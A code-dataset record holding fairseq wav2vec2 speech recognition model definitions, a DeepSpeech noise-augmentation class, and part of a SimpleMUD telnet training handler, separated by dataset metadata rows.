def forward(self, **kwargs):
x = self.w2v_encoder(**kwargs)
return x
@dataclass
class Wav2Vec2Seq2SeqConfig(Wav2Vec2AsrConfig):
decoder_embed_dim: int = field(
default=768, metadata={"help": "decoder embedding dimension"}
)
decoder_ffn_embed_dim: int = field(
default=3072, metadata={"help": "decoder embedding dimension for FFN"}
)
decoder_layers: int = field(default=6, metadata={"help": "num of decoder layers"})
decoder_layerdrop: float = field(
default=0.0, metadata={"help": "decoder layerdrop chance"}
)
decoder_attention_heads: int = field(
default=4, metadata={"help": "num decoder attention heads"}
)
decoder_learned_pos: bool = field(
default=False,
metadata={"help": "use learned positional embeddings in the decoder"},
)
decoder_normalize_before: bool = field(
default=False, metadata={"help": "apply layernorm before each decoder block"}
)
no_token_positional_embeddings: bool = field(
default=False,
metadata={
"help": "if set, disables positional embeddings (outside self attention)"
},
)
decoder_dropout: float = field(
default=0.0, metadata={"help": "dropout probability in the decoder"}
)
decoder_attention_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability for attention weights inside the decoder"
},
)
decoder_activation_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability after activation in FFN inside the decoder"
},
)
max_target_positions: int = field(
default=2048, metadata={"help": "max target positions"}
)
share_decoder_input_output_embed: bool = field(
default=False, metadata={"help": "share decoder input and output embeddings"}
)
@register_model("wav2vec_seq2seq", dataclass=Wav2Vec2Seq2SeqConfig)
class Wav2Vec2Seq2SeqModel(FairseqEncoderDecoderModel):
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
@classmethod
def build_model(cls, cfg: Wav2Vec2Seq2SeqConfig, task: FairseqTask):
"""Build a new model instance."""
src_dict, tgt_dict = task.source_dictionary, task.target_dictionary
def build_embedding(dictionary, embed_dim):
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
emb = Embedding(num_embeddings, embed_dim, padding_idx)
return emb
decoder_embed_tokens = build_embedding(tgt_dict, cfg.decoder_embed_dim)
encoder = cls.build_encoder(cfg)
decoder = cls.build_decoder(cfg, tgt_dict, decoder_embed_tokens)
return Wav2Vec2Seq2SeqModel(encoder, decoder)
@classmethod
def build_encoder(cls, cfg: Wav2Vec2AsrConfig):
return Wav2VecEncoder(cfg)
@classmethod
def build_decoder(cls, cfg: Wav2Vec2Seq2SeqConfig, tgt_dict, embed_tokens):
return TransformerDecoder(cfg, tgt_dict, embed_tokens)
def forward(self, **kwargs):
encoder_out = self.encoder(tbc=False, **kwargs)
decoder_out = self.decoder(encoder_out=encoder_out, **kwargs)
return decoder_out
def upgrade_state_dict_named(self, state_dict, name):
super().upgrade_state_dict_named(state_dict, name)
return state_dict
class Wav2VecEncoder(FairseqEncoder):
def __init__(self, cfg: Wav2Vec2AsrConfig, tgt_dict=None):
self.apply_mask = cfg.apply_mask
arg_overrides = {
"dropout": cfg.dropout,
"activation_dropout": cfg.activation_dropout,
"dropout_input": cfg.dropout_input,
"attention_dropout": cfg.attention_dropout,
"mask_length": cfg.mask_length,
"mask_prob": cfg.mask_prob,
"mask_selection": cfg.mask_selection,
"mask_other": cfg.mask_other,
"no_mask_overlap": cfg.no_mask_overlap,
"mask_channel_length": cfg.mask_channel_length,
"mask_channel_prob": cfg.mask_channel_prob,
"mask_channel_selection": cfg.mask_channel_selection,
"mask_channel_other": cfg.mask_channel_other,
"no_mask_channel_overlap": cfg.no_mask_channel_overlap,
"encoder_layerdrop": cfg.layerdrop,
"feature_grad_mult": cfg.feature_grad_mult,
}
if cfg.w2v_args is None:
state = checkpoint_utils.load_checkpoint_to_cpu(cfg.w2v_path, arg_overrides)
w2v_args = state.get("cfg", None)
if w2v_args is None:
w2v_args = convert_namespace_to_omegaconf(state["args"])
cfg.w2v_args = w2v_args
else:
state = None
w2v_args = cfg.w2v_args
if isinstance(w2v_args, Namespace):
cfg.w2v_args = w2v_args = convert_namespace_to_omegaconf(w2v_args)
assert cfg.normalize == w2v_args.task.normalize, (
"Fine-tuning works best when data normalization is the same. "
"Please check that --normalize is set or unset for both pre-training and here"
)
w2v_args.task.data = cfg.data
task = tasks.setup_task(w2v_args.task)
model = task.build_model(w2v_args.model)
if state is not None and not cfg.no_pretrained_weights:
model.load_state_dict(state["model"], strict=True)
model.remove_pretraining_modules()
super().__init__(task.source_dictionary)
d = w2v_args.model.encoder_embed_dim
self.w2v_model = model
self.final_dropout = nn.Dropout(cfg.final_dropout)
self.freeze_finetune_updates = cfg.freeze_finetune_updates
self.num_updates = 0
if tgt_dict is not None:
self.proj = Linear(d, len(tgt_dict))
elif getattr(cfg, "decoder_embed_dim", d) != d:
self.proj = Linear(d, cfg.decoder_embed_dim)
else:
self.proj = None
def set_num_updates(self, num_updates):
"""Set the number of parameters updates."""
super().set_num_updates(num_updates)
self.num_updates = num_updates
def forward(self, source, padding_mask, tbc=True, **kwargs):
w2v_args = {
"source": source,
"padding_mask": padding_mask,
"mask": self.apply_mask and self.training,
}
ft = self.freeze_finetune_updates <= self.num_updates
with torch.no_grad() if not ft else contextlib.ExitStack():
x, padding_mask = self.w2v_model.extract_features(**w2v_args)
if tbc:
# B x T x C -> T x B x C
x = x.transpose(0, 1)
x = self.final_dropout(x)
if self.proj:
x = self.proj(x)
return {
"encoder_out": x, # T x B x C
"encoder_padding_mask": padding_mask, # B x T
"padding_mask": padding_mask,
}
def reorder_encoder_out(self, encoder_out, new_order):
if encoder_out["encoder_out"] is not None:
encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select(
1, new_order
)
if encoder_out["encoder_padding_mask"] is not None:
encoder_out["encoder_padding_mask"] = encoder_out[
"encoder_padding_mask"
].index_select(0, new_order)
return encoder_out
def max_positions(self):
"""Maximum input length supported by the encoder."""
return None
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
class TransformerDecoder(FairseqIncrementalDecoder):
"""
Transformer decoder consisting of *args.decoder_layers* layers. Each layer
is a :class:`TransformerDecoderLayer`.
Args:
args (argparse.Namespace): parsed command-line arguments
dictionary (~fairseq.data.Dictionary): decoding dictionary
embed_tokens (torch.nn.Embedding): output embedding
no_encoder_attn (bool, optional): whether to attend to encoder outputs
(default: False).
"""
def __init__(
self,
cfg: Wav2Vec2Seq2SeqConfig,
dictionary,
embed_tokens,
no_encoder_attn=False,
):
super().__init__(dictionary)
self.dropout = cfg.decoder_dropout
self.share_input_output_embed = cfg.share_decoder_input_output_embed
input_embed_dim = embed_tokens.embedding_dim
embed_dim = cfg.decoder_embed_dim
self.output_embed_dim = cfg.decoder_embed_dim
self.layerdrop = cfg.decoder_layerdrop
padding_idx = embed_tokens.padding_idx
self.max_target_positions = cfg.max_target_positions
self.embed_tokens = embed_tokens
self.embed_scale = math.sqrt(embed_dim) # todo: try with input_embed_dim
self.project_in_dim = (
Linear(input_embed_dim, embed_dim, bias=False)
if embed_dim != input_embed_dim
else None
)
self.embed_positions = (
PositionalEmbedding(
cfg.max_target_positions,
embed_dim,
padding_idx,
learned=cfg.decoder_learned_pos,
)
if not cfg.no_token_positional_embeddings
else None
)
# TODO: update this when transformer gets converted to dataclass configs
transformer_cfg = copy.deepcopy(cfg)
with open_dict(transformer_cfg):
transformer_cfg.dropout = transformer_cfg.decoder_dropout
transformer_cfg.attention_dropout = (
transformer_cfg.decoder_attention_dropout
)
transformer_cfg.activation_dropout = (
transformer_cfg.decoder_activation_dropout
)
self.layers = nn.ModuleList([])
self.layers.extend(
[
TransformerDecoderLayer(transformer_cfg, no_encoder_attn)
for _ in range(transformer_cfg.decoder_layers)
]
)
if not self.share_input_output_embed:
self.embed_out = nn.Parameter(
torch.Tensor(len(dictionary), self.output_embed_dim)
)
nn.init.normal_(self.embed_out, mean=0, std=self.output_embed_dim ** -0.5)
if transformer_cfg.decoder_normalize_before:
self.layer_norm = LayerNorm(embed_dim)
else:
self.layer_norm = None
def forward(
self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused
):
"""
Args:
prev_output_tokens (LongTensor): previous decoder outputs of shape
`(batch, tgt_len)`, for teacher forcing
encoder_out (Tensor, optional): output from the encoder, used for
encoder-side attention
incremental_state (dict): dictionary used for storing state during
:ref:`Incremental decoding`
Returns:
tuple:
- the decoder's output of shape `(batch, tgt_len, vocab)`
- a dictionary with any model-specific outputs
"""
prev_output_tokens = prev_output_tokens.long()
x, extra = self.extract_features(
prev_output_tokens, encoder_out, incremental_state
)
x = self.output_layer(x)
return x, extra
def extract_features(
self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused
):
"""
Similar to *forward* but only return features.
Returns:
tuple:
- the decoder's features of shape `(batch, tgt_len, embed_dim)`
- a dictionary with any model-specific outputs
"""
# embed positions
positions = (
self.embed_positions(
prev_output_tokens, incremental_state=incremental_state
)
if self.embed_positions is not None
else None
)
if incremental_state is not None:
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# embed tokens and positions
x = self.embed_scale * self.embed_tokens(prev_output_tokens)
if self.project_in_dim is not None:
x = self.project_in_dim(x)
if positions is not None:
x += positions
x = F.dropout(x, p=self.dropout, training=self.training)
# B x T x C -> T x B x C
x = x.transpose(0, 1)
attn = None
inner_states = [x]
# decoder layers
for layer in self.layers:
dropout_probability = np.random.random()
if not self.training or (dropout_probability > self.layerdrop):
x, attn, _ = layer(
x,
encoder_out["encoder_out"] if encoder_out is not None else None,
encoder_out["encoder_padding_mask"]
if encoder_out is not None
else None,
incremental_state,
self_attn_mask=self.buffered_future_mask(x)
if incremental_state is None
else None,
)
inner_states.append(x)
if self.layer_norm:
x = self.layer_norm(x)
# T x B x C -> B x T x C
x = x.transpose(0, 1)
return x, {"attn": attn, "inner_states": inner_states}
def output_layer(self, features, **kwargs):
"""Project features to the vocabulary size."""
# project back to size of vocabulary
if self.share_input_output_embed:
return F.linear(features, self.embed_tokens.weight)
else:
return F.linear(features, self.embed_out)
def max_positions(self):
"""Maximum output length supported by the decoder."""
if self.embed_positions is None:
return self.max_target_positions
return min(self.max_target_positions, self.embed_positions.max_positions)
def buffered_future_mask(self, tensor):
dim = tensor.size(0)
if (
not hasattr(self, "_future_mask")
or self._future_mask is None
or self._future_mask.device != tensor.device
or self._future_mask.size(0) < dim
):
self._future_mask = torch.triu(
utils.fill_with_neg_inf(tensor.new(dim, dim)), 1
)
return self._future_mask[:dim, :dim]
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def Linear(in_features, out_features, bias=True):
m = nn.Linear(in_features, out_features, bias)
nn.init.xavier_uniform_(m.weight)
if bias:
nn.init.constant_(m.bias, 0.0)
return m
| 34.521886
| 90
| 0.631913
|
from argparse import Namespace
import contextlib
import copy
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dataclasses import dataclass, field
from omegaconf import MISSING, II, open_dict
from typing import Any
from fairseq import checkpoint_utils, tasks, utils
from fairseq.dataclass import FairseqDataclass
from fairseq.dataclass.utils import convert_namespace_to_omegaconf
from fairseq.tasks import FairseqTask
from fairseq.models import (
BaseFairseqModel,
FairseqEncoder,
FairseqEncoderDecoderModel,
FairseqIncrementalDecoder,
register_model,
)
from fairseq.models.wav2vec.wav2vec2 import MASKING_DISTRIBUTION_CHOICES
from fairseq.modules import LayerNorm, PositionalEmbedding, TransformerDecoderLayer
@dataclass
class Wav2Vec2AsrConfig(FairseqDataclass):
w2v_path: str = field(
default=MISSING, metadata={"help": "path to wav2vec 2.0 model"}
)
no_pretrained_weights: bool = field(
default=False, metadata={"help": "if true, does not load pretrained weights"}
)
dropout_input: float = field(
default=0.0,
metadata={"help": "dropout to apply to the input (after feat extr)"},
)
final_dropout: float = field(
default=0.0,
metadata={"help": "dropout after transformer and before final projection"},
)
dropout: float = field(
default=0.0, metadata={"help": "dropout probability inside wav2vec 2.0 model"}
)
attention_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability for attention weights inside wav2vec 2.0 model"
},
)
activation_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability after activation in FFN inside wav2vec 2.0 model"
},
)
apply_mask: bool = field(
default=False, metadata={"help": "apply masking during fine-tuning"}
)
mask_length: int = field(
default=10, metadata={"help": "repeat the mask indices multiple times"}
)
mask_prob: float = field(
default=0.5,
metadata={
"help": "probability of replacing a token with mask (normalized by length)"
},
)
mask_selection: MASKING_DISTRIBUTION_CHOICES = field(
default="static", metadata={"help": "how to choose masks"}
)
mask_other: float = field(
default=0,
metadata={
"help": "secondary mask argument (used for more complex distributions), "
"see help in compute_mask_indices"
},
)
no_mask_overlap: bool = field(
default=False, metadata={"help": "whether to allow masks to overlap"}
)
mask_channel_length: int = field(
default=10, metadata={"help": "length of the mask for features (channels)"}
)
mask_channel_prob: float = field(
default=0.0, metadata={"help": "probability of replacing a feature with 0"}
)
mask_channel_selection: MASKING_DISTRIBUTION_CHOICES = field(
default="static",
metadata={"help": "how to choose mask length for channel masking"},
)
mask_channel_other: float = field(
default=0,
metadata={
"help": "secondary mask argument (used for more complex distributions), "
"see help in compute_mask_indicesh"
},
)
no_mask_channel_overlap: bool = field(
default=False, metadata={"help": "whether to allow channel masks to overlap"}
)
freeze_finetune_updates: int = field(
default=0, metadata={"help": "dont finetune wav2vec for this many updates"}
)
feature_grad_mult: float = field(
default=0.0, metadata={"help": "reset feature grad mult in wav2vec 2.0 to this"}
)
layerdrop: float = field(
default=0.0, metadata={"help": "probability of dropping a layer in wav2vec 2.0"}
)
normalize: bool = II("task.normalize")
data: str = II("task.data")
w2v_args: Any = None
@dataclass
class Wav2Vec2CtcConfig(Wav2Vec2AsrConfig):
pass
@register_model("wav2vec_ctc", dataclass=Wav2Vec2CtcConfig)
class Wav2VecCtc(BaseFairseqModel):
def __init__(self, cfg: Wav2Vec2CtcConfig, w2v_encoder: BaseFairseqModel):
super().__init__()
self.cfg = cfg
self.w2v_encoder = w2v_encoder
def upgrade_state_dict_named(self, state_dict, name):
super().upgrade_state_dict_named(state_dict, name)
return state_dict
@classmethod
def build_model(cls, cfg: Wav2Vec2CtcConfig, task: FairseqTask):
w2v_encoder = Wav2VecEncoder(cfg, task.target_dictionary)
return cls(cfg, w2v_encoder)
def get_normalized_probs(self, net_output, log_probs):
logits = net_output["encoder_out"]
if log_probs:
return utils.log_softmax(logits.float(), dim=-1)
else:
return utils.softmax(logits.float(), dim=-1)
def forward(self, **kwargs):
x = self.w2v_encoder(**kwargs)
return x
@dataclass
class Wav2Vec2Seq2SeqConfig(Wav2Vec2AsrConfig):
decoder_embed_dim: int = field(
default=768, metadata={"help": "decoder embedding dimension"}
)
decoder_ffn_embed_dim: int = field(
default=3072, metadata={"help": "decoder embedding dimension for FFN"}
)
decoder_layers: int = field(default=6, metadata={"help": "num of decoder layers"})
decoder_layerdrop: float = field(
default=0.0, metadata={"help": "decoder layerdrop chance"}
)
decoder_attention_heads: int = field(
default=4, metadata={"help": "num decoder attention heads"}
)
decoder_learned_pos: bool = field(
default=False,
metadata={"help": "use learned positional embeddings in the decoder"},
)
decoder_normalize_before: bool = field(
default=False, metadata={"help": "apply layernorm before each decoder block"}
)
no_token_positional_embeddings: bool = field(
default=False,
metadata={
"help": "if set, disables positional embeddings (outside self attention)"
},
)
decoder_dropout: float = field(
default=0.0, metadata={"help": "dropout probability in the decoder"}
)
decoder_attention_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability for attention weights inside the decoder"
},
)
decoder_activation_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability after activation in FFN inside the decoder"
},
)
max_target_positions: int = field(
default=2048, metadata={"help": "max target positions"}
)
share_decoder_input_output_embed: bool = field(
default=False, metadata={"help": "share decoder input and output embeddings"}
)
@register_model("wav2vec_seq2seq", dataclass=Wav2Vec2Seq2SeqConfig)
class Wav2Vec2Seq2SeqModel(FairseqEncoderDecoderModel):
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
@classmethod
def build_model(cls, cfg: Wav2Vec2Seq2SeqConfig, task: FairseqTask):
src_dict, tgt_dict = task.source_dictionary, task.target_dictionary
def build_embedding(dictionary, embed_dim):
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
emb = Embedding(num_embeddings, embed_dim, padding_idx)
return emb
decoder_embed_tokens = build_embedding(tgt_dict, cfg.decoder_embed_dim)
encoder = cls.build_encoder(cfg)
decoder = cls.build_decoder(cfg, tgt_dict, decoder_embed_tokens)
return Wav2Vec2Seq2SeqModel(encoder, decoder)
@classmethod
def build_encoder(cls, cfg: Wav2Vec2AsrConfig):
return Wav2VecEncoder(cfg)
@classmethod
def build_decoder(cls, cfg: Wav2Vec2Seq2SeqConfig, tgt_dict, embed_tokens):
return TransformerDecoder(cfg, tgt_dict, embed_tokens)
def forward(self, **kwargs):
encoder_out = self.encoder(tbc=False, **kwargs)
decoder_out = self.decoder(encoder_out=encoder_out, **kwargs)
return decoder_out
def upgrade_state_dict_named(self, state_dict, name):
super().upgrade_state_dict_named(state_dict, name)
return state_dict
class Wav2VecEncoder(FairseqEncoder):
def __init__(self, cfg: Wav2Vec2AsrConfig, tgt_dict=None):
self.apply_mask = cfg.apply_mask
arg_overrides = {
"dropout": cfg.dropout,
"activation_dropout": cfg.activation_dropout,
"dropout_input": cfg.dropout_input,
"attention_dropout": cfg.attention_dropout,
"mask_length": cfg.mask_length,
"mask_prob": cfg.mask_prob,
"mask_selection": cfg.mask_selection,
"mask_other": cfg.mask_other,
"no_mask_overlap": cfg.no_mask_overlap,
"mask_channel_length": cfg.mask_channel_length,
"mask_channel_prob": cfg.mask_channel_prob,
"mask_channel_selection": cfg.mask_channel_selection,
"mask_channel_other": cfg.mask_channel_other,
"no_mask_channel_overlap": cfg.no_mask_channel_overlap,
"encoder_layerdrop": cfg.layerdrop,
"feature_grad_mult": cfg.feature_grad_mult,
}
if cfg.w2v_args is None:
state = checkpoint_utils.load_checkpoint_to_cpu(cfg.w2v_path, arg_overrides)
w2v_args = state.get("cfg", None)
if w2v_args is None:
w2v_args = convert_namespace_to_omegaconf(state["args"])
cfg.w2v_args = w2v_args
else:
state = None
w2v_args = cfg.w2v_args
if isinstance(w2v_args, Namespace):
cfg.w2v_args = w2v_args = convert_namespace_to_omegaconf(w2v_args)
assert cfg.normalize == w2v_args.task.normalize, (
"Fine-tuning works best when data normalization is the same. "
"Please check that --normalize is set or unset for both pre-training and here"
)
w2v_args.task.data = cfg.data
task = tasks.setup_task(w2v_args.task)
model = task.build_model(w2v_args.model)
if state is not None and not cfg.no_pretrained_weights:
model.load_state_dict(state["model"], strict=True)
model.remove_pretraining_modules()
super().__init__(task.source_dictionary)
d = w2v_args.model.encoder_embed_dim
self.w2v_model = model
self.final_dropout = nn.Dropout(cfg.final_dropout)
self.freeze_finetune_updates = cfg.freeze_finetune_updates
self.num_updates = 0
if tgt_dict is not None:
self.proj = Linear(d, len(tgt_dict))
elif getattr(cfg, "decoder_embed_dim", d) != d:
self.proj = Linear(d, cfg.decoder_embed_dim)
else:
self.proj = None
def set_num_updates(self, num_updates):
super().set_num_updates(num_updates)
self.num_updates = num_updates
def forward(self, source, padding_mask, tbc=True, **kwargs):
w2v_args = {
"source": source,
"padding_mask": padding_mask,
"mask": self.apply_mask and self.training,
}
ft = self.freeze_finetune_updates <= self.num_updates
with torch.no_grad() if not ft else contextlib.ExitStack():
x, padding_mask = self.w2v_model.extract_features(**w2v_args)
if tbc:
x = x.transpose(0, 1)
x = self.final_dropout(x)
if self.proj:
x = self.proj(x)
return {
"encoder_out": x,
"encoder_padding_mask": padding_mask,
"padding_mask": padding_mask,
}
def reorder_encoder_out(self, encoder_out, new_order):
if encoder_out["encoder_out"] is not None:
encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select(
1, new_order
)
if encoder_out["encoder_padding_mask"] is not None:
encoder_out["encoder_padding_mask"] = encoder_out[
"encoder_padding_mask"
].index_select(0, new_order)
return encoder_out
def max_positions(self):
return None
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
class TransformerDecoder(FairseqIncrementalDecoder):
def __init__(
self,
cfg: Wav2Vec2Seq2SeqConfig,
dictionary,
embed_tokens,
no_encoder_attn=False,
):
super().__init__(dictionary)
self.dropout = cfg.decoder_dropout
self.share_input_output_embed = cfg.share_decoder_input_output_embed
input_embed_dim = embed_tokens.embedding_dim
embed_dim = cfg.decoder_embed_dim
self.output_embed_dim = cfg.decoder_embed_dim
self.layerdrop = cfg.decoder_layerdrop
padding_idx = embed_tokens.padding_idx
self.max_target_positions = cfg.max_target_positions
self.embed_tokens = embed_tokens
self.embed_scale = math.sqrt(embed_dim)
self.project_in_dim = (
Linear(input_embed_dim, embed_dim, bias=False)
if embed_dim != input_embed_dim
else None
)
self.embed_positions = (
PositionalEmbedding(
cfg.max_target_positions,
embed_dim,
padding_idx,
learned=cfg.decoder_learned_pos,
)
if not cfg.no_token_positional_embeddings
else None
)
transformer_cfg = copy.deepcopy(cfg)
with open_dict(transformer_cfg):
transformer_cfg.dropout = transformer_cfg.decoder_dropout
transformer_cfg.attention_dropout = (
transformer_cfg.decoder_attention_dropout
)
transformer_cfg.activation_dropout = (
transformer_cfg.decoder_activation_dropout
)
self.layers = nn.ModuleList([])
self.layers.extend(
[
TransformerDecoderLayer(transformer_cfg, no_encoder_attn)
for _ in range(transformer_cfg.decoder_layers)
]
)
if not self.share_input_output_embed:
self.embed_out = nn.Parameter(
torch.Tensor(len(dictionary), self.output_embed_dim)
)
nn.init.normal_(self.embed_out, mean=0, std=self.output_embed_dim ** -0.5)
if transformer_cfg.decoder_normalize_before:
self.layer_norm = LayerNorm(embed_dim)
else:
self.layer_norm = None
def forward(
self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused
):
prev_output_tokens = prev_output_tokens.long()
x, extra = self.extract_features(
prev_output_tokens, encoder_out, incremental_state
)
x = self.output_layer(x)
return x, extra
def extract_features(
self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused
):
positions = (
self.embed_positions(
prev_output_tokens, incremental_state=incremental_state
)
if self.embed_positions is not None
else None
)
if incremental_state is not None:
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
x = self.embed_scale * self.embed_tokens(prev_output_tokens)
if self.project_in_dim is not None:
x = self.project_in_dim(x)
if positions is not None:
x += positions
x = F.dropout(x, p=self.dropout, training=self.training)
x = x.transpose(0, 1)
attn = None
inner_states = [x]
for layer in self.layers:
dropout_probability = np.random.random()
if not self.training or (dropout_probability > self.layerdrop):
x, attn, _ = layer(
x,
encoder_out["encoder_out"] if encoder_out is not None else None,
encoder_out["encoder_padding_mask"]
if encoder_out is not None
else None,
incremental_state,
self_attn_mask=self.buffered_future_mask(x)
if incremental_state is None
else None,
)
inner_states.append(x)
if self.layer_norm:
x = self.layer_norm(x)
x = x.transpose(0, 1)
return x, {"attn": attn, "inner_states": inner_states}
def output_layer(self, features, **kwargs):
if self.share_input_output_embed:
return F.linear(features, self.embed_tokens.weight)
else:
return F.linear(features, self.embed_out)
def max_positions(self):
if self.embed_positions is None:
return self.max_target_positions
return min(self.max_target_positions, self.embed_positions.max_positions)
def buffered_future_mask(self, tensor):
dim = tensor.size(0)
if (
not hasattr(self, "_future_mask")
or self._future_mask is None
or self._future_mask.device != tensor.device
or self._future_mask.size(0) < dim
):
self._future_mask = torch.triu(
utils.fill_with_neg_inf(tensor.new(dim, dim)), 1
)
return self._future_mask[:dim, :dim]
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def Linear(in_features, out_features, bias=True):
m = nn.Linear(in_features, out_features, bias)
nn.init.xavier_uniform_(m.weight)
if bias:
nn.init.constant_(m.bias, 0.0)
return m
| true
| true
|
790b0c39682933c1feb2c6fab90ea0c2e8d189c6
| 2,733
|
py
|
Python
|
deepspeech/frontend/augmentor/noise_perturb.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
deepspeech/frontend/augmentor/noise_perturb.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
deepspeech/frontend/augmentor/noise_perturb.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the noise perturb augmentation model."""
from deepspeech.frontend.audio import AudioSegment
from deepspeech.frontend.augmentor.base import AugmentorBase
from deepspeech.frontend.utility import read_manifest
class NoisePerturbAugmentor(AugmentorBase):
"""Augmentation model for adding background noise.
:param rng: Random generator object.
:type rng: random.Random
:param min_snr_dB: Minimal signal noise ratio, in decibels.
:type min_snr_dB: float
:param max_snr_dB: Maximal signal noise ratio, in decibels.
:type max_snr_dB: float
:param noise_manifest_path: Manifest path for noise audio data.
:type noise_manifest_path: str
"""
def __init__(self, rng, min_snr_dB, max_snr_dB, noise_manifest_path):
self._min_snr_dB = min_snr_dB
self._max_snr_dB = max_snr_dB
self._rng = rng
self._noise_manifest = read_manifest(manifest_path=noise_manifest_path)
def __call__(self, x, uttid=None, train=True):
if not train:
return x
self.transform_audio(x)
return x
def transform_audio(self, audio_segment):
"""Add background noise audio.
Note that this is an in-place transformation.
:param audio_segment: Audio segment to add effects to.
:type audio_segment: AudioSegmenet|SpeechSegment
"""
noise_json = self._rng.choice(self._noise_manifest, 1, replace=False)[0]
if noise_json['duration'] < audio_segment.duration:
raise RuntimeError("The duration of sampled noise audio is smaller "
"than the audio segment to add effects to.")
diff_duration = noise_json['duration'] - audio_segment.duration
start = self._rng.uniform(0, diff_duration)
end = start + audio_segment.duration
noise_segment = AudioSegment.slice_from_file(
noise_json['audio_filepath'], start=start, end=end)
snr_dB = self._rng.uniform(self._min_snr_dB, self._max_snr_dB)
audio_segment.add_noise(
noise_segment, snr_dB, allow_downsampling=True, rng=self._rng)
| 42.046154
| 80
| 0.71094
|
from deepspeech.frontend.audio import AudioSegment
from deepspeech.frontend.augmentor.base import AugmentorBase
from deepspeech.frontend.utility import read_manifest
class NoisePerturbAugmentor(AugmentorBase):
def __init__(self, rng, min_snr_dB, max_snr_dB, noise_manifest_path):
self._min_snr_dB = min_snr_dB
self._max_snr_dB = max_snr_dB
self._rng = rng
self._noise_manifest = read_manifest(manifest_path=noise_manifest_path)
def __call__(self, x, uttid=None, train=True):
if not train:
return x
self.transform_audio(x)
return x
def transform_audio(self, audio_segment):
noise_json = self._rng.choice(self._noise_manifest, 1, replace=False)[0]
if noise_json['duration'] < audio_segment.duration:
raise RuntimeError("The duration of sampled noise audio is smaller "
"than the audio segment to add effects to.")
diff_duration = noise_json['duration'] - audio_segment.duration
start = self._rng.uniform(0, diff_duration)
end = start + audio_segment.duration
noise_segment = AudioSegment.slice_from_file(
noise_json['audio_filepath'], start=start, end=end)
snr_dB = self._rng.uniform(self._min_snr_dB, self._max_snr_dB)
audio_segment.add_noise(
noise_segment, snr_dB, allow_downsampling=True, rng=self._rng)
| true
| true
|
790b0c51e0ac839b5fdaf84458d325b4adaeab5a
| 3,221
|
py
|
Python
|
src/training_handler.py
|
tobynance/simple_mud
|
c9be32327fcab0c9bd37fabedb7dd566709b7d48
|
[
"MIT"
] | 6
|
2015-04-24T13:09:37.000Z
|
2022-01-27T01:12:47.000Z
|
src/training_handler.py
|
tobynance/simple_mud
|
c9be32327fcab0c9bd37fabedb7dd566709b7d48
|
[
"MIT"
] | 15
|
2015-03-09T00:07:55.000Z
|
2015-03-10T02:30:23.000Z
|
src/training_handler.py
|
tobynance/simple_mud
|
c9be32327fcab0c9bd37fabedb7dd566709b7d48
|
[
"MIT"
] | 2
|
2015-04-24T13:09:38.000Z
|
2020-12-22T08:40:07.000Z
|
import logging
import player
import telnet
logger = logging.getLogger(__name__)
########################################################################
class TrainingHandler(telnet.MudTelnetHandler):
####################################################################
def __init__(self, protocol, player):
super(TrainingHandler, self).__init__(protocol)
self.player = player
####################################################################
def handle(self, data):
if data == "quit":
player.player_database.save()
self.protocol.remove_handler()
return
if data in ["1", "2", "3"]:
if self.player.stat_points > 0:
self.player.stat_points -= 1
if data == "1":
self.player.attributes.BASE_STRENGTH += 1
elif data == "2":
self.player.attributes.BASE_HEALTH += 1
else:
self.player.attributes.BASE_AGILITY += 1
self.print_stats(True)
else:
logger.warn("unknown command: %s", data)
self.send("<reset><clearscreen><red>Unknown Command '%s'<newline>" % data)
self.print_stats(False)
####################################################################
def enter(self):
self.player.active = False
if self.player.newbie:
self.send(("<magenta><bold>Welcome to SimpleMUD, %s!\r\n" +
"You must train your character with your desired stats,\r\n" +
"before you enter the realm.\r\n\r\n") % self.player.name)
self.player.newbie = False
self.print_stats(False)
####################################################################
def hung_up(self):
logger.warn("%s - hung up in %s", self.protocol.get_remote_address(), self.__class__.__name__)
player.player_database.logout(self.player.id)
####################################################################
def flooded(self):
logger.warn("%s - flooded in %s", self.protocol.get_remote_address(), self.__class__.__name__)
player.player_database.logout(self.player.id)
